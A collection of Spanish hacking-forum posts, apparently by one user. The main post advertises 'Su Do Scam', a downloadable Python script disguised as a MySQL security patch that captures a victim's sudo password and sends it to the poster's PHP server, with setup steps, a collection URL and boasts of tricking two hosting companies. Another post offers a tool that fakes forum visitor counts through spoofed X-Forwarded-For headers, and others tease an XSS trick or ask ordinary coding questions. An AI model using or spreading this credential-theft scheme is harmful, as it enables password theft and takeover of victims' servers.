Esta tarde, en un ataque de "inspiracion" (si se peude llamar asi   ) se me ocurrio una forma de ""XSS"", o incluso de hacer inyecciones SQL por una via de entrada muy utilizada, pero en la que nadie suele reparar ni es filtrada..

En resumen.. ¿sabes como hice este XSS? (Solo con la direcciond e la web es facil   )

Pista: No fue en la peticion GET ni POST (modificada)

Hoy andaba tranquilamente revisando el foro con mi chrome cuando....

ZAS!



Bueno, no se si sera solo ese post, o el foro entero, pero me hizo abrir mi Avast, que hacia meses que no lo activaba..

Alguien sabe que hay de ese sitio ahi?

Viendo el poco malware que hay para Linux.. aqui viene un simple malware para distros de GNU/Linux que usan el comando "sudo", como el archiconocido Ubuntu y su familia  

Esta programado en Phyton, y simula ser un scrip de instalacion, o de ejecucion de algun programa, el cual debes de correr con un comando sudo especial, como veremos mas adelante.

Su Do Scam

version 1.2

Nuestra desprevenida victima, inocentemente, intentara, en un servidor corriendo Ubuntu Server, ejecutar el "Parche de Seguridad para MySQL" que encontro en nuestra web.  

Hara un y vera esto :



Sorprendido pensara en lo increiblemente bueno y seguro que es su Ubuntu, y en la de formas distintas que hay de hacer la misma cosa...  

Asi que seguira las instrucciones de el parche:



Perfecto, el sudo de toda la vida. No se ve la pass al escribirla, todo parece normal. Aprieta intro...



Oh, vaya, el lado malo de Linux. Parece que me falta una lib...   despues de duros intentos, desiste y se va al bar a tomar unas cervezas.

Ahi es cuando entramos nosotros, visitamos nuestro servidor.. y ¡oh, sorpresa! ¿que hay alli?

¿Que sera?

Con estos datos entrar por ssh y rootear es un juego de niños  

Vale, un experto quizas no caera en esto.. pero he probado con dos empresas de hosting, y han caido como conejos  

Modo de uso
-Abrir la carpeta www y subir los archivos de ahi a un servidor web que permita php (dadle permisos 777 )
-Abrir la carpeta bin, el archivo install y editar en la configuracion la url de nuestro archivo php recien subido
-Preparad algo para que el script resulte creible  

[DESCARGA]
Bueno, no es una obra de ingenieria, pero si de arte
 Si lo probais sin configurar ni nada, aqui van a parar los datos (a menos de que lo cambieis):
http://antaroth.es/stolen.txt

Siguendo la iniciativa de codigo libre personal que llevo manteniendo estos años, os presento una version Open Source del Ghost SMF de WHK. Es poco ineficaz, ya que uso la urllib por pura vagueria, pero si veo que os gusta, lo paso a sockets.

Esta programado en Phyton, y segun mis calculos es mucho mas rapida que la Ghost SMF

Snake Ghost SMF

version 0.4


Su uso no tiene perdida, solo necesitais escribir la url del foro que querais (deberia de ir con cualquier tipo de foro, pero solo lo he probado en SMF)

Vereis esto:


Y tras unos segundos...



Debido a que es la primera aplicacion que hago en Phyton, y la primera en la que el rendimiento es critico, hay un pequeño fallo:



Si veo que os animais, saco la version optimizada

PD: No me he basado en el de WHK para hacerlo

Explicacion de funcionamiento:
Es simple, hacemos peticiones masicas a la url que introducimos, añadiendo una cabecera modificada, el X-Forwarded-For. 

Esta cabecera hace pensar a SMF que somos un proxy a traves del cual estan entrando centenares de users para ver el foro, cada uno con distinta IP, con lo que les suma a las estadisticas 

Para descargar, haz click en el amigo

Los que useis Windows, necesitareis bajaros Python de la web oficial
Para los Linuxeros, ./ 

Estoy haciendo un bot y necesitaria saber como puedo sacar las URLs de un Richtextbox y guardarlas en un txt, en distintas lineas.
Gracias! 

Ultimamente se esta viendo demasiado spam por el foro, vendría bien que se añadieran dificultades de registro a los bots.
Gracias!

Estoy haciendo una aplicacion con Sockets (basada en el Tutorial de Sockets de Hendriҳ), pero con la diferencia de que yo lo he intentado hacer con formularios, y he tenido dos problemas.

1.-Al darle al boton de escuchar, el programa se cuelga. Le envio mensajes por el Netcat y no responde, pero al enviarle el comando EXIT, que cierra la conexion interrumpiendo el bucle do, el programa se "descuelga" y puedo ver todo lo que le he enviado, la pregunta es si se puede conseguir hacerlo de otra forma para que no se cuelgue.    (Con consola va perfeco)

2.-El texto que aparece en el textbox "llegada" aparece demasiado seguido, le he añadido un TAB porque no se cual es la forma de indicar un salto de linea.
 

Aquí esta el código:

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.Net;
using System.Net.Sockets;
 
namespace Hola_Netcat_
{
 
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }
 
        private void Form1_Load(object sender, EventArgs e)
        {
 
 
        }
 
        private void button1_Click(object sender, EventArgs e)
        {
 
                       IPAddress direc = Dns.GetHostEntry("localhost").AddressList[0];
            IPEndPoint Ep = new IPEndPoint(direc, 1235);
            Socket socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
            socket.Bind(Ep);
            socket.Listen(100);
            Socket handler = socket.Accept();
 
            byte[] bytes = new byte[1024]; //Declaramos un array de bytes de longitud 1024
            int count;
            String data = ""; //Declaramos data, que sera donde se guarde lo que recibamos
            string limp = ""; //Declaramos limp, donde se almacenara data sin salto de linea
            int longi ; //Declaramos longi, donde se almacenara la longitud de data
 
            do //Bucle Do/While
            {
                count = handler.Receive(bytes); //Recibimos los datos enviados y lo guardamos en cout.
                data = System.Text.Encoding.ASCII.GetString(bytes, 0, count); //Lo codificamos a cadena (ya que se envian como bytes)
                if (data != "salir\n") //Mientras lo recibido no sea exit + intro
                {
                    longi = data.Length - 1;
                    limp = data.Remove(longi, 1);
 
                    llegada.Text = llegada.Text + "Informacion recibida:" + limp + "  "; //Mostramos lo recibido con el textbox "llegada"
                }
 
 
            } while (data != "exit\n");  //Mientras lo recibido no sea exit + Intro se continua el bucle, si recibimos exit + intro, salimos del bucle
 
            llegada.Text =  llegada.Text + "Se ha finalizado la conexión"; //Avisamos qde que se a terminado la transferencia de datos
 
            byte[] msg = System.Text.Encoding.ASCII.GetBytes("\n\nFinalizada conexion con la aplicacion"); //Codificamos de string a byte
 
            handler.Send(msg); //Enviamos el mensage al cliente
            handler.Shutdown(SocketShutdown.Both); //"Apagamos" los sockets
            handler.Close(); //Los cerramos
 
        }
 
        private void timer1_Tick(object sender, EventArgs e)
        {
 
        }
}
 
 
 
 
 
 
        }
 
 

Muchas gracias al que me ayude.